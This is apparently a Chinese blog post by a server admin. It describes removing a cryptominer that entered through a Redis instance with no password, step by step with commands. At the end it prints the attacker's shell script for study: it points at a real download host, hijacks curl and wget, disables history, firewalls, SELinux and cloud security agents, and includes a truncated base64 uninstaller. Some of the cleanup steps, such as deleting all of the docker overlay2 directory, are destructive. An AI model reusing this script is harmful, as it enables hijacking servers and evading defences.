服務(wù)器被攻擊了，然后再不整改就被限制了

查閱了很多資料來應(yīng)對(duì)，畢竟剛?cè)胧址?wù)器啥也不知道

使用命令看一下，果然是有定時(shí)啟動(dòng)的

vim /var/log/cron

和界面上報(bào)錯(cuò)是一樣的

一般這種是端口開放的問題，起初我還以為是docker的問題，我把docker的端口給關(guān)了，然后網(wǎng)上說是可能是像redis，或者其他端口配置沒有安全配置導(dǎo)致的

一定要注意端口的問題，不然被攻擊成礦機(jī)夠折騰的。

此時(shí)，你可以嘗試將redis端口給關(guān)了，我的話是

先檢查下redis

進(jìn)入redis,首先你要知道你的redis安裝在哪了

whereis redis-cli

進(jìn)入之后

redis-cli -p 6379

進(jìn)入redis

查看自己的redis是否配置密碼

那么腳本是很容易從這里入侵到你的服務(wù)器的

使用curl命令下載sh文件，跑一下就寄

設(shè)置redis 密碼(臨時(shí)，永久在下面)

config set requirepass ************

設(shè)置一下

當(dāng)你退出之后在進(jìn)行操作就不可以啦

但是這種方式是臨時(shí)的，重啟之后仍然會(huì)失效

那么我們?cè)谂渲梦募羞M(jìn)行配置

找到redis.conf

操作即可

可以在編輯中? 使用/requirepass footbared

定位到位置，然后

requirepass *******就行了

重啟redis

systemctl restart redis.service

systemctl status redis 查看狀態(tài)

檢查是否配置成功

跟前面一樣，先進(jìn)入目錄中，然后登陸redis

輸入get key*

發(fā)現(xiàn)是不行的

那么我們進(jìn)行登錄

auth ******（你剛才設(shè)置的密碼）

結(jié)果輸出為ok

然后就可以正常使用redis了

這里我打算重啟下服務(wù)器，看是否還會(huì)被挖礦，但是心里是有數(shù)的，因?yàn)槿思沂峭ㄟ^接口進(jìn)來的，已經(jīng)完成挖礦配置了，應(yīng)該是阻止不了的

在根目錄下，使用ll -rta看看那些文件被修改了(腳本發(fā)生時(shí)間為9.25號(hào)10點(diǎn)左右)

盡量選擇時(shí)間與發(fā)生日期相差不多的時(shí)間段，就比如跨越幾年幾個(gè)月的時(shí)間就算了吧

仔細(xì)檢查/home? ?/root 等地方

我是先在root發(fā)現(xiàn)了問題

然后我就看到了9.25號(hào)這些文件時(shí)間確實(shí)一模一樣

authorized_keys? 且是為了免密登陸的

那我開始執(zhí)行刪除

那么清洗其屬性，本質(zhì)也是系統(tǒng)權(quán)限設(shè)置的所以沒事

那么我想使用chattr來修改文件屬性權(quán)限

結(jié)果chattr: command not found

被腳本卸載了，麻了

那么如果你的還在的話，可以跳過了這一步了{(lán)

安裝chattr

yum install e2fsprogs

一般可能安裝包還是有的，沒有卸載

所以可以直接用來安裝

chattr 本身就是e2fsprogs

結(jié)果好家伙又出問題了

Failed to set locale, defaulting to C.UTF-8??

安裝失敗

查詢資料表示是因?yàn)闆]有設(shè)置好環(huán)境導(dǎo)致的

運(yùn)行l(wèi)ocale命令

解決方法為運(yùn)行以下指令，在運(yùn)行l(wèi)ocale就沒有這些問題了

echo "export LC_ALL=en_US.UTF-8" >> /etc/profile

source /etc/profile

現(xiàn)在繼續(xù)安裝

結(jié)果還是不行

chattr還是找不到命令

我嘗試去找chattr，因?yàn)橛悬c(diǎn)博客說chattr可能移到了其他地方

先切換到根目錄，然后執(zhí)行，其他子目錄不一定找得到

find -name chattr

也順便找到一些proc?

大概這里出現(xiàn)：

?find -name chattr

./var/lib/docker/overlay2/4362bde84fd652a9ab41989c1d6b5d688cb0d1345172265c142adb8cc776447c/diff/bin/chattr

./var/lib/docker/overlay2/8be99b28e5bc86f6d2158ca963df6ecac6a41e4b95a0e62f219f3bd2cebc14d3/diff/usr/bin/chattr

./var/lib/docker/overlay2/196f754ebc38c60aff435c92f2548d6808352eaf079d36cc5df49c592e2828be/diff/usr/bin/chattr

./var/lib/docker/overlay2/0b23070518ea4281899c2c772c207cb20c219330533d98fcaf930c90d72cdac9/diff/usr/bin/chattr

./var/lib/docker/overlay2/7a5f30a6ef8e0cc88330533f26f0c3bcc2f9ee85a850e27a726b74e48bcd0f5d/diff/usr/bin/chattr

./var/lib/docker/overlay2/1eadf06a371819054f343753563ecb36ce6fe4e1da9afd0b3fdd4aff15aeb883/diff/usr/bin/chattr

find: ‘./proc/150404/task/150404/net’: Invalid argument

find: ‘./proc/150404/net’: Invalid argument

find: ‘./proc/158775/task/158957/fdinfo’: No such file or directory

find: ‘./proc/158775/task/158957/ns’: No such file or directory

find: ‘./proc/158775/task/158957/net’: No such file or directory

find: ‘./proc/158775/task/158957/attr’: No such file or directory

find: ‘./proc/158775/task/158958’: No such file or directory

find: ‘./proc/158775/task/158960’: No such file or directory

find: ‘./proc/158775/task/158962’: No such file or directory

find: ‘./proc/158775/task/158963’: No such file or directory

find: ‘./proc/158775/task/158966’: No such file or directory

find: ‘./proc/158775/task/158969’: No such file or directory

find: ‘./proc/158775/task/158972’: No such file or directory

find: ‘./proc/158775/task/158973’: No such file or directory

find: ‘./proc/158775/task/158974’: No such file or directory

find: ‘./proc/158775/task/158977’: No such file or directory

find: ‘./proc/158775/task/158980/fd/206’: No such file or directory

find: ‘./proc/158775/task/158980/fd/207’: No such file or directory

find: ‘./proc/158775/task/158980/fd/209’: No such file or directory

find: ‘./proc/158775/task/158980/fd/210’: No such file or directory

find: ‘./proc/158775/task/158980/fd/212’: No such file or directory

find: ‘./proc/158775/task/158980/fd/213’: No such file or directory

find: ‘./proc/158775/task/158980/fd/214’: No such file or directory

find: ‘./proc/158775/task/158980/fd/215’: No such file or directory

find: ‘./proc/158775/task/158980/fd/216’: No such file or directory

find: ‘./proc/158775/task/158980/fd/218’: No such file or directory

find: ‘./proc/158775/task/158980/fd/221’: No such file or directory

find: ‘./proc/158775/task/158980/fd/227’: No such file or directory

find: ‘./proc/158775/task/158980/fd/228’: No such file or directory

find: ‘./proc/158775/task/158980/fd/229’: No such file or directory

find: ‘./proc/158775/task/158980/fd/230’: No such file or directory

find: ‘./proc/158775/task/158980/fd/232’: No such file or directory

find: ‘./proc/158775/task/158980/fd/234’: No such file or directory

find: ‘./proc/158775/task/158980/fd/235’: No such file or directory

find: ‘./proc/158775/task/158980/fd/237’: No such file or directory

find: ‘./proc/158775/task/158980/fd/238’: No such file or directory

find: ‘./proc/158775/task/158980/fd/240’: No such file or directory

find: ‘./proc/158775/task/158980/fd/242’: No such file or directory

find: ‘./proc/158775/task/158980/fd/245’: No such file or directory

find: ‘./proc/158775/task/158980/fd/248’: No such file or directory

find: ‘./proc/158775/task/158980/fd/249’: No such file or directory

find: ‘./proc/158775/task/158980/fd/250’: No such file or directory

find: ‘./proc/158775/task/158980/fd/252’: No such file or directory

find: ‘./proc/158775/task/158980/fd/255’: No such file or directory

find: ‘./proc/158775/task/158980/fd/258’: No such file or directory

find: ‘./proc/158775/task/158980/fd/261’: No such file or directory

find: ‘./proc/158775/task/158980/fd/262’: No such file or directory

find: ‘./proc/158775/task/158980/fd/267’: No such file or directory

find: ‘./proc/158775/task/158980/fd/270’: No such file or directory

find: ‘./proc/158775/task/158980/fd/272’: No such file or directory

find: ‘./proc/158775/task/158980/fd/276’: No such file or directory

find: ‘./proc/158775/task/158980/fd/278’: No such file or directory

find: ‘./proc/158775/task/158980/fd/280’: No such file or directory

find: ‘./proc/158775/task/158980/fd/283’: No such file or directory

find: ‘./proc/158775/task/158980/fd/289’: No such file or directory

find: ‘./proc/158775/task/158980/fd/291’: No such file or directory

find: ‘./proc/158775/task/158980/fd/292’: No such file or directory

find: ‘./proc/158775/task/158980/fd/293’: No such file or directory

find: ‘./proc/158775/task/158980/fd/294’: No such file or directory

find: ‘./proc/158775/task/158980/fd/299’: No such file or directory

find: ‘./proc/158775/task/158980/fd/300’: No such file or directory

find: ‘./proc/158775/task/158980/fd/301’: No such file or directory

find: ‘./proc/158775/task/158980/fd/305’: No such file or directory

find: ‘./proc/158775/task/158980/fd/306’: No such file or directory

find: ‘./proc/158775/task/158980/fd/308’: No such file or directory

find: ‘./proc/158775/task/158980/fd/310’: No such file or directory

find: ‘./proc/158775/task/158980/fd/311’: No such file or directory

find: ‘./proc/158775/task/158980/fd/314’: No such file or directory

find: ‘./proc/158775/task/158980/fd/315’: No such file or directory

find: ‘./proc/158775/task/158980/fd/316’: No such file or directory

find: ‘./proc/158775/task/158980/fd/317’: No such file or directory

find: ‘./proc/158775/task/158980/fd/318’: No such file or directory

find: ‘./proc/158775/task/158980/fd/319’: No such file or directory

find: ‘./proc/158775/task/158980/fd/320’: No such file or directory

find: ‘./proc/158775/task/158980/fd/323’: No such file or directory

find: ‘./proc/158775/task/158980/fd/324’: No such file or directory

find: ‘./proc/158775/task/158980/fd/325’: No such file or directory

find: ‘./proc/158775/task/158980/fd/326’: No such file or directory

find: ‘./proc/158775/task/158980/fd/328’: No such file or directory

find: ‘./proc/158775/task/158980/fd/330’: No such file or directory

find: ‘./proc/158775/task/158980/fd/333’: No such file or directory

find: ‘./proc/158775/task/158980/fd/335’: No such file or directory

find: ‘./proc/158775/task/158980/fd/336’: No such file or directory

find: ‘./proc/158775/task/158980/fd/337’: No such file or directory

find:?

然后我打可以從這里下手，這一定有問題

首先是我到達(dá)./var/lib/docker 目錄我直接刪除overlay2/

清空

再次嘗試，說我已經(jīng)install

那么思考到可能yum沒法搞了

那我我先卸載那些包吧，然后下一個(gè)官網(wǎng)上的包，然后解壓試試能用不

過程：

yum remove?e2fsprogs

成功刪除

自行去找tar.gz包吧這里不放連接了，b站問題

上傳到服務(wù)器上

我是放在opt下，然后解壓

tar -xzvf e2fsprogs-1.46.5.tar.gz

解壓完成，期間由于內(nèi)存以及cpu拉滿，等待了一段時(shí)間

?然后進(jìn)入文件夾

編譯：

./configure

make

make install

完成裝配

（如果在編譯的過程出現(xiàn)錯(cuò)誤等，自行百度搜素，一般是環(huán)境依賴不行導(dǎo)致的，下載或者使用其他方法）

即可

測(cè)試：

如果你到這里成功了，那么chattr應(yīng)該是安裝成功了

我通過這個(gè)并沒有安裝成功，麻了，繼續(xù)尋找方法

從一篇博客找到了一個(gè)方法繼續(xù)實(shí)驗(yàn)：

下載chattr.c文件，然后上傳到服務(wù)器

文件地址在這里https://github.com/posborne/linux-programming-interface-exercises/chattr.c?

刪除所有有關(guān)chattr? 以及 e2fsprogs

比如?/usr/bin/chattr

你可以用whereis chattr看一下在哪，然后刪除他們

yum install e2fsprogs? 重新下載即可

發(fā)現(xiàn)已經(jīng)可以用chattr了

然后刪除這些東西

}

chattr -ia 文件名

chattr -i 文件名

他有什么屬性都給他清理了

接下來操作挖礦病毒crypto,pnscan文件

/usr/share目錄下

可以看到crypto文件

有關(guān)的也都刪了

保險(xiǎn)起見whereis crypto一下

看到

定位到/usr/share/man這邊

我現(xiàn)在已經(jīng)想把這個(gè)man文件夾刪除完了

lsattr 看一下man的屬性

發(fā)現(xiàn)是一個(gè)e屬性

rm -rf? man 刪除

現(xiàn)在在查找 pnscan 的東西

直接刪

rm -rf pnscan

文件已經(jīng)刪除了

那么看一下進(jìn)程

把ssh，python等進(jìn)程先停了再說

然后把 有ia屬性的文件夾都給刪除

/etc/下的文件：

（cron.d,contab）

/var/spool/? :

并不顯示出來占用高的進(jìn)程

可以確定要么是top的問題，要么是故意掩蓋住的問題

如果懷疑是top的問題，你可以用lsattr或者其他命令查看是否被篡改過了

或者下載htop來看cpu等一系列參數(shù)

但是我用htop也一樣并無法看到

那么這個(gè)病毒要審視一下

netstat -anp

可以看到確實(shí)是有其他程序在運(yùn)行的，且進(jìn)程名為-

操作：

cat?/etc/ld.so.preload

輸出：

因?yàn)檫@個(gè)目錄下有很多.so文件，我這里也不懂，暫時(shí)先刪除剛才輸出的部分文件

rm -rf '[cmake].so' 文件，結(jié)果為不允許操作，越是不允許越是確定這個(gè)文件有問題

chattr -i '[cmake]'.so

清理/etc/ld.so.preload

我這里打算先刪除這些文件

刪除過程中報(bào)了一個(gè)錯(cuò)

這里展示出來：

對(duì)ld.so.preload文件屬性修改? （我的是有? i屬性）

之后執(zhí)行：

引用：

（該博客地址為：(https://blog.csdn.net/zhanghenan123/article/details/88718898）

echo "" > /etc/ld.so.preload

chattr +i /etc

rm -rf /var/spool/cron/*

rm -rf /etc/cron.d/*

chattr +i /var/spool/cron/

rm -f /usr/local/lib/lbb.so

chattr +i /usr/local/lib

killall kworkerds

rm -f /var/tmp/kworkerds*

rm -f /var/tmp/1.so

rm -f /tmp/kworkerds*

rm -f /tmp/1.so

rm -f /var/tmp/wc.conf

rm -f tmp/wc.conf

基本就是刪除東西然后上鎖，防止被修改

期中報(bào)錯(cuò)的是因?yàn)槲抑苯影岩粋€(gè)文件上層在這之前就刪除了

/etc/rc.d/? ? etc下有關(guān)rc.d的文件都刪了吧，這種刪還不錯(cuò)的一般都是病毒

現(xiàn)在適應(yīng)top來看一下

已經(jīng)能定位到這個(gè)命令了

繼續(xù)加油！

到這里其實(shí)很明朗了，pid該病毒是隨機(jī)分配的，然后命令式【cmake】

以及masscan也要注意一下

那么使用ps -ef | grep pid 來看一下文件的位置

然后定位到文件位置

查看一下

執(zhí)行刪除

rm -rf cmake

rm -rf cmake.pid 文件

相關(guān)的都刪除了

害怕有隱藏文件

果然，在本來ls 展示出來的文件中并沒有這個(gè)

以及這個(gè)..lph/

里面的創(chuàng)建時(shí)間是9.25 與入侵時(shí)間一致

那么我刪除

rm -rf ..lph/

查一下httpd

/bin/bash? 我沒有發(fā)現(xiàn)設(shè)么問題

/etc/.hjttpd/.../下面我發(fā)現(xiàn)了問題

注意這里ls? 的話看其來沒有東西，建議使用ls -a來看一下隱藏文件，好家伙，有很多，我第一反應(yīng)是直接刪了

rm -rf .../ 還不讓刪除

top命令

kill --9 pid （去殺死有關(guān)httpd的東西）

kill -9 所有cpu占據(jù)高的進(jìn)程

OK到這里已經(jīng)完成

最后提供這個(gè)腳本來供大家參考

方便研究，因?yàn)閷?duì)一個(gè)腳本的研究才是最能解決服務(wù)器的原因

#!/bin/bash

##variables

domain=205.185.118.246

mainurl=http://$domain/b2f628/

proxyport=1414

#init environment

m_command()

{

if [ -x /bin/chattr ];then

? ? mv /bin/chattr /bin/zzhcht

elif [ -x /usr/bin/chattr ];then

? ? mv /usr/bin/chattr /usr/bin/zzhcht

fi

if [ -x /bin/zzhcht ];then

? ? export CHATTR=/bin/zzhcht

elif [ -x /usr/bin/zzhcht ];then

? ? export CHATTR=/usr/bin/zzhcht

else

? ? export CHATTR=chattr

fi

if [ -f /bin/curl ];then

? ? export CURL_CMD="/bin/curl"

elif [ -f /usr/bin/curl ];then

? ? export CURL_CMD="/usr/bin/curl"

fi

if [ -f /bin/wget ];then

? ? export WGET_CMD="/bin/wget"

elif [ -f /usr/bin/wget ];then

? ? export WGET_CMD="/usr/bin/wget"

fi

if [ -x "/usr/bin/wge" -o -x "/bin/wge" ];then

? ? if [ -f /bin/wge ];then

? ? ? ? export WGET_CMD="/bin/wge"

? ? elif [ -f /usr/bin/wge ];then

? ? ? ? export WGET_CMD="/usr/bin/wge"

? ? fi

? ? mv /bin/wge /bin/wls || mv /usr/bin/wge /usr/bin/wls

fi

if [ -x "/usr/bin/wd1" -o -x "/bin/wd1" ];then

? ? if [ -f /usr/bin/wd1 ];then

? ? ? ? export WGET_CMD="/usr/bin/wd1"

? ? elif [ -f /bin/wd1 ];then

? ? ? ? export WGET_CMD="/bin/wd1"

? ? fi

? ? mv /bin/wd1 /bin/wls || mv /usr/bin/wd1 /usr/bin/wls?

fi

if [ -x "/usr/bin/wget1" -o -x "/bin/wget1" ];then

? ? if [ -f /bin/wget1 ];then

? ? ? ? export WGET_CMD="/bin/wget1"

? ? elif [ -f /usr/bin/wget1 ];then

? ? ? ? export WGET_CMD="/usr/bin/wget1"

? ? fi

? ? mv /bin/wget1 /bin/wls || mv /usr/bin/wget1 /usr/bin/wls

fi

if [ -x "/usr/bin/wdt" -o -x "/bin/wdt" ];then

? ? if [ -f /bin/wdt ];then

? ? ? ? export WGET_CMD="/bin/wdt"

? ? elif [ -f /usr/bin/wdt ];then

? ? ? ? export WGET_CMD="/usr/bin/wdt"

? ? fi

? ? mv /bin/wdt /bin/wls || mv /usr/bin/wdt /usr/bin/wls

fi

if [ -x "/usr/bin/wdz" -o -x "/bin/wdz" ];then

? ? if [ -f /usr/bin/wdz ];then

? ? ? ? export WGET_CMD="/usr/bin/wdz"

? ? elif [ -f /bin/wdz ];then

? ? ? ? export WGET_CMD="/bin/wdz"

? ? fi

? ? cp /bin/wdz /bin/wls || cp /usr/bin/wdz /usr/bin/wls

fi

if [ -x "/usr/bin/xget" -o -x "bin/xget" ];then

? ? if [ -f /bin/xget ];then

? ? ? ? export WGET_CMD="/bin/xget"

? ? elif [ -f /usr/bin/xget ];then

? ? ? ? export WGET_CMD="/usr/bin/xget"

? ? fi?

? ? mv /bin/xget /bin/wls || /usr/bin/xget /usr/bin/wls

fi?

if [ -x "/bin/wls" ];then

? ? export WGET_CMD="/bin/wls"

elif [ -x "/usr/bin/wls" ];then

? ? export WGET_CMD="/usr/bin/wls"

else

? ? if [ $(command -v yum) ];then??

? ? ? ? rpm -e --nodeps wget?

? ? ? ? yum remove -y wget

? ? ? ? yum install -y wget??

? ? else

? ? ? ? apt-get remove -y wget

? ? ? ? apt-get install -y wget

? ? fi

? ? mv /bin/wget /bin/wls || mv /usr/bin/wget /usr/bin/wls

? ? if [ -f /bin/wls ];then

? ? ? ? export WGET_CMD="/bin/wls"?

? ? elif [ -f /usr/bin/wls ];then

? ? ? ? export WGET_CMD="/usr/bin/wls"

? ? fi??

fi

if [ -x "/usr/bin/cd1" -o -x "/bin/cd1" ];then

? ? if [ -f /bin/cd1 ];then

? ? ? ? export CURL_CMD="/bin/cd1"

? ? elif [ -f /usr/bin/cd1 ];then

? ? ? ? export CURL_CMD="/usr/bin/cd1"

? ? fi

? ? mv /bin/cd1 /bin/cls || mv /usr/bin/cd1 /usr/bin/cls

fi

if [ -x "/usr/bin/curl" -o -x "/bin/curl" ];then?

? ? if [ -f /bin/curl ];then

? ? ? ? export CURL_CMD="/bin/curl"

? ? elif [ -f /usr/bin/curl ];then

? ? ? ? export CURL_CMD="/usr/bin/curl"

? ? fi

? ? mv /bin/curl /bin/cls || mv /usr/bin/curl /usr/bin/cls

fi

if [ -x "/usr/bin/cdz" -o -x "/bin/cdz" ];then

? ? if [ -f /bin/cdz ];then

? ? ? ? export CURL_CMD="/bin/cdz"

? ? elif [ -f /usr/bin/cdz ];then

? ? ? ? export CURL_CMD="/usr/bin/cdz"

? ? fi

? ? cp /bin/cdz /bin/cls || cp /usr/bin/cdz /usr/bin/cls

fi

if [ -x "/usr/bin/cur" -o -x "/bin/cur" ];then

? ? if [ -f /bin/cur ];then

? ? ? ? export CURL_CMD="/bin/cur"

? ? elif [ -f /usr/bin/cur ];then

? ? ? ? export CURL_CMD="/usr/bin/cur"

? ? fi

? ? mv /bin/cur /bin/cls || mv /usr/bin/cur /usr/bin/cls

fi

if [ -x "/usr/bin/TNTcurl" -o -x "/bin/TNTcurl" ];then

? ? if [ -f /bin/TNTcurl ];then

? ? ? ? export CURL_CMD="/bin/TNTcurl"

? ? elif [ -f /usr/bin/TNTcurl ];then

? ? ? ? export CURL_CMD="/usr/bin/TNTcurl"

? ? fi

? ? mv /bin/TNTcurl /bin/cls || mv /usr/bin/TNTcurl /usr/bin/cls

fi

if [ -x "/usr/bin/curltnt" -o -x "/bin/curltnt" ];then

? ? if [ -f /bin/curltnt ];then?

? ? ? ? export CURL_CMD="/bin/curltnt"

? ? elif [ -f /usr/bin/curltxt ];then

? ? ? ? export CURL_CMD="/usr/bin/curltnt"

? ? fi

? ? mv /bin/curltnt /bin/cls || mv /usr/bin/curltnt /usr/bin/cls

fi

if [ -x "/usr/bin/curl1" -o -x "/bin/curl1" ];then

? ? if [ -f /bin/curl1 ];then

? ? ? ? export CURL_CMD="/bin/curl1"

? ? elif [ -f /usr/bin/curl1 ];then

? ? ? ? export CURL_CMD="/usr/bin/curl1"

? ? fi

? ? mv /bin/curl1 /bin/cls || mv /usr/bin/curl1 /usr/bin/cls

fi

if [ -x "/usr/bin/cdt" -o -x "/bin/cdt" ];then

? ? if [ -f /bin/cdt ];then

? ? ? ? export CURL_CMD="/bin/cdt"

? ? elif [ -f /usr/bin/cdt ];then

? ? ? ? export CURL_CMD="/usr/bin/cdt"

? ? fi

? ? mv /bin/cdt /bin/cls || mv /usr/bin/cdt /usr/bin/cls

fi

if [ -x "/usr/bin/xcurl" -o -x "/bin/xcurl" ];then

? ? if [ -f /bin/xcurl ];then

? ? ? ? export CURL_CMD="/bin/xcurl"

? ? elif [ -f /usr/bin/xcurl ];then

? ? ? ? export CURL_CMD="/usr/bin/xcurl"

? ? fi

? ? mv /bin/xcurl /bin/cls || mv /usr/bin/xcurl /usr/bin/wls

fi

if [ -x "/usr/bin/cls" ];then

? ? export CURL_CMD="/usr/bin/cls"

elif [ -x "/bin/cls" ];then

? ? export CURL_CMD="/bin/cls"

else

? ? if [ $(command -v yum) ];then?

? ? ? ? rpm -e --nodeps curl

? ? ? ? yum remove curl

? ? ? ? yum install -y curl??

? ? else

? ? ? ? apt-get remove curl

? ? ? ? apt-get install -y? curl

? ? fi

? ? mv /bin/curl /bin/cls || mv /usr/bin/curl /usr/bin/cls

? ? if [ -f /bin/cls ];then

? ? ? ? export CURL_CMD="/bin/cls"

? ? elif [ -f /usr/bin/cls ];then

? ? ? ? export CURL_CMD="/usr/bin/cls"

? ? fi

fi?

}

yum_ins()

{

yum clean all

for pkg in gcc make kmod net-tools "kernel-devel-uname-r == $(uname -r)"

do

yum install -y $pkg

done

}

apk_ins()

{

apk update

for pkg in gcc make kmod? linux-headers net-tools

do

apk add $pkg

done

}

apt_ins()

{

apt update --fix-missing

for pkg in gcc make kmod net-tools linux-headers-$(uname -r)

do

apt-get install -y $pkg

done

}

ins_package()

{

if?

type apk 2>/dev/null 1>/dev/null;

then?

apk_ins

fi

if?

type apt 2>/dev/null 1>/dev/null;

then?

apt_ins

fi

if?

type yum 2>/dev/null 1>/dev/null;

then?

yum_ins

fi

}

check_exist()

{

if [ -x /usr/bin/netstat -o /bin/netstat ]

then

for pt in $(netstat -an|grep EST|grep "$proxyport"|awk '{print $5}'|awk -F ":" '{print $NF}')

do

? ?if [ "$pt" == "$proxyport" ];then

? ?echo "miner running"

? ?exit 1

? ?else

? ?echo "miner may not running,check next port"

? ?fi

done

else

? ? ? ? echo "haha"

fi

}

clean_monitor()

{

iptables -F

ulimit -n 65535 2>/dev/null 1>/dev/null

export LC_ALL=C?

HISTCONTROL="ignorespace${HISTCONTROL:+:$HISTCONTROL}" 2>/dev/null 1>/dev/null

export HISTFILE=/dev/null 2>/dev/null 1>/dev/null

unset HISTFILE 2>/dev/null 1>/dev/null

shopt -ou history 2>/dev/null 1>/dev/null

set +o history 2>/dev/null 1>/dev/null

HISTSIZE=0 2>/dev/null 1>/dev/null

export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games

setenforce 0 2>/dev/null 1>/dev/null

echo SELINUX=disabled >/etc/selinux/config 2>/dev/null

if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop apparmor 2>/dev/null 1>/dev/null ; systemctl disable apparmor 2>/dev/null 1>/dev/null ; else service apparmor stop 2>/dev/null 1>/dev/null ; fi

if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop aliyun.service 2>/dev/null 1>/dev/null ; systemctl disable aliyun.service 2>/dev/null 1>/dev/null ; else service aliyun.service stop 2>/dev/null 1>/dev/null ; fi

ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 % 2>/dev/null 1>/dev/null

ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 % 2>/dev/null 1>/dev/null

if [ -d "/usr/local/aegis/" ]; then rm -rf /usr/local/aegis 2>/dev/null 1>/dev/null ; fi

if type ufw 2>/dev/null 1>/dev/null; then ufw disable 2>/dev/null 1>/dev/null ; fi

if type iptables 2>/dev/null 1>/dev/null; then iptables -F 2>/dev/null 1>/dev/null ; fi

sysctl kernel.nmi_watchdog=0 2>/dev/null 1>/dev/null

if [ -f "/proc/sys/kernel/nmi_watchdog" ]; then echo '0' >/proc/sys/kernel/nmi_watchdog 2>/dev/null ; fi

if [ -f "/etc/sysctl.conf" ]; then echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf 2>/dev/null ; fi

if ps aux | grep -i '[a]liyun' 2>/dev/null 1>/dev/null; then

? echo 'IyEvYmluL2Jhc2gKCkFFR0lTX0lOU1RBTExfRElSPSIvdXNyL2xvY2FsL2FlZ2lzIgojY2hlY2sgbGludXggR2VudG9vIG9zIAp2YXI9YGxzYl9yZWxlYXNlIC1hIHwgZ3JlcCBHZW50b29gCmlmIFsgLXogIiR7dmFyfSIgXTsgdGhlbiAKCXZhcj1gY2F0IC9ldGMvaXNzdWUgfCBncmVwIEdlbnRvb2AKZmkKY2hlY2tDb3Jlb3M9YGNhdCAvZXRjL29zLXJlbGVhc2UgMj4vZGV2L251bGwgfCBncmVwIGNvcmVvc2AKaWYgWyAtZCAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdCIgLWEgLW4gIiR7dmFyfSIgXTsgdGhlbgoJTElOVVhfUkVMRUFTRT0iR0VOVE9PIgplbGlmIFsgLWYgIi9ldGMvb3MtcmVsZWFzZSIgLWEgLW4gIiR7Y2hlY2tDb3Jlb3N9IiBdOyB0aGVuCglMSU5VWF9SRUxFQVNFPSJDT1JFT1MiCglBRUdJU19JTlNUQUxMX0RJUj0iL29wdC9hZWdpcyIKZWxzZSAKCUxJTlVYX1JFTEVBU0U9Ik9USEVSIgpmaQkJCgpzdG9wX2FlZ2lzX3BraWxsKCl7CiAgICBwa2lsbCAtOSBBbGlZdW5EdW4gPi9kZXYvbnVsbCAyPiYxCiAgICBwa2lsbCAtOSBBbGlIaWRzID4vZGV2L251bGwgMj4mMQogICAgcGtpbGwgLTkgQWxpSGlwcyA+L2Rldi9udWxsIDI+JjEKICAgIHBraWxsIC05IEFsaU5ldCA+L2Rldi9udWxsIDI+JjEKICAgIHBraWxsIC05IEFsaVNlY0d1YXJkID4vZGV2L251bGwgMj4mMQogICAgcGtpbGwgLTkgQWxpWXVuRHVuVXBkYXRlID4vZGV2L251bGwgMj4mMQogICAgCiAgICAvdXNyL2xvY2FsL2FlZ2lzL0FsaU5ldC9BbGlOZXQgLS1zdG9wZHJpdmVyCiAgICAvdXNyL2xvY2FsL2FlZ2lzL2FsaWhpcHMvQWxpSGlwcyAtLXN0b3Bkcml2ZXIKICAgIC91c3IvbG9jYWwvYWVnaXMvQWxpU2VjR3VhcmQvQWxpU2VjR3VhcmQgLS1zdG9wZHJpdmVyCiAgICBwcmludGYgIiUtNDBzICU0MHNcbiIgIlN0b3BwaW5nIGFlZ2lzIiAiWyAgT0sgIF0iCn0KCiMgY2FuIG5vdCByZW1vdmUgYWxsIGFlZ2lzIGZvbGRlciwgYmVjYXVzZSB0aGVyZSBpcyBiYWNrdXAgZmlsZSBpbiBnbG9iYWxjZmcKcmVtb3ZlX2FlZ2lzKCl7CmlmIFsgLWQgIiR7QUVHSVNfSU5TVEFMTF9ESVJ9IiBdO3RoZW4KICAgIHVtb3VudCAke0FFR0lTX0lOU1RBTExfRElSfS9hZWdpc19kZWJ1ZwogICAgcm0gLXJmICR7QUVHSVNfSU5TVEFMTF9ESVJ9L2FlZ2lzX2NsaWVudAogICAgcm0gLXJmICR7QUVHSVNfSU5TVEFMTF9ESVJ9L2FlZ2lzX3VwZGF0ZQoJcm0gLXJmICR7QUVHSVNfSU5TVEFMTF9ESVJ9L2FsaWhpZHMKICAgIHJtIC1yZiAke0FFR0lTX0lOU1RBTExfRElSfS9nbG9iYWxjZmcvZG9tYWluY2ZnLmluaQpmaQp9Cgp1bmluc3RhbGxfc2VydmljZSgpIHsKICAgCiAgIGlmIFsgLWYgIi9ldGMvaW5pdC5kL2FlZ2lzIiBdOyB0aGVuCgkJL2V0Yy9pbml0LmQvYWVnaXMgc3RvcCAgPi9kZXYvbnVsbCAyPiYxCgkJcm0gLWYgL2V0Yy9pbml0LmQvYWVnaXMgCiAgIGZpCgoJaWYgWyAkTElOVVhfUkVMRUFTRSA9ICJHRU5UT08iIF07IHRoZW4KCQlyYy11cGRhdGUgZGVsIGFlZ2lzIGRlZmF1bHQgMj4vZGV2L251bGwKCQlpZiBbIC1mICIvZXRjL3J1bmxldmVscy9kZWZhdWx0L2FlZ2lzIiBdOyB0aGVuCgkJCXJtIC1mICIvZXRjL3J1bmxldmVscy9kZWZhdWx0L2FlZ2lzIiA+L2Rldi9udWxsIDI+JjE7CgkJZmkKICAgIGVsaWYgWyAtZiAvZXRjL2luaXQuZC9hZWdpcyBdOyB0aGVuCiAgICAgICAgIC9ldGMvaW5pdC5kL2FlZ2lzICB1bmluc3RhbGwKCSAgICBmb3IgKCh2YXI9MjsgdmFyPD01OyB2YXIrKykpIGRvCgkJCWlmIFsgLWQgIi9ldGMvcmMke3Zhcn0uZC8iIF07dGhlbgoJCQkJIHJtIC1mICIvZXRjL3JjJHt2YXJ9LmQvUzgwYWVnaXMiCgkJICAgIGVsaWYgWyAtZCAiL2V0Yy9yYy5kL3JjJHt2YXJ9LmQiIF07dGhlbgoJCQkJcm0gLWYgIi9ldGMvcmMuZC9yYyR7dmFyfS5kL1M4MGFlZ2lzIgoJCQlmaQoJCWRvbmUKICAgIGZpCgp9CgpzdG9wX2FlZ2lzX3BraWxsCnVuaW5zdGFsbF9zZXJ2aWNlCnJlbW92ZV9hZWdpcwp1bW91bnQgJHtBRUdJU19JTlNUQUxMX0RJUn0vYWVnaXNfZGVidWcKCgpwcmludGYgIiUtNDBzICU0MHNcbiIgIlVuaW5zdGFsbGluZyBhZWdpcyIgICJbI